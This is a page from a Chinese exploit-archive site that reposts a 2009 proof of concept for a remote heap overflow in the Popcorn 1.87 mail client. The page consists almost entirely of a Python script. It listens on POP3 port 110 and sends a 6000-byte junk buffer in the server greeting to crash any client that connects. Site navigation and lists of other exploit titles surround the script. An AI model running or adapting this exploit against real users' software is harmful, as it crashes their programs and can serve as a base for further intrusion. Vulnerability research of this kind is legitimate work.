首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Popcorn 1.87 Remote Heap Overflow Exploit PoC
来源:www.vfcocus.net 作者:x.CJP.x 发布时间:2009-04-24  

#!/usr/bin/python
#[x]Product download : http://www.ultrafunk.com/products/popcorn/
#[+]Founder : x.CJP.x
#[+]Greeting : His0k4,Sub-Zero,Bibi-info,Aach2006,Youness,Simitch,Halimz,Bibicha.. :=)
#[-]Seni seviyorum, base64_decode('TW91bmE=');

from socket import *
import struct

buffer="\x41"*6000 # just random

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 110))
s.listen(1)
print "[*] Listening on [POP3] 110"
c, addr = s.accept()
print "[*] Connection accepted from: %s" % (addr[0])

c.send("+OK "+buffer+"\r\n")
c.recv(512)
raw_input("[*] Crashed!\nPress key to quit")
c.close()
s.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dream FTP Server 1.02 (users.d
·CoolPlayer Portable 2.19.1 (Sk
·Home Web Server <= r1.7.1 (bui
·Norton Ghost Support module fo
·Absolute Form Processor XE-V 1
·Zervit HTTP Server <= 0.3 (soc
·SDP Downloader v2.3.0 (.ASX Fi
·CoolPlayer Portable 2.19.1 (m3
·Microsoft Internet Infomation
·linux内核CAP_KILL校验本地提权
·PJblog V3.0 0day+EXP
·libvirt_proxy <= 0.5.1 Local P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved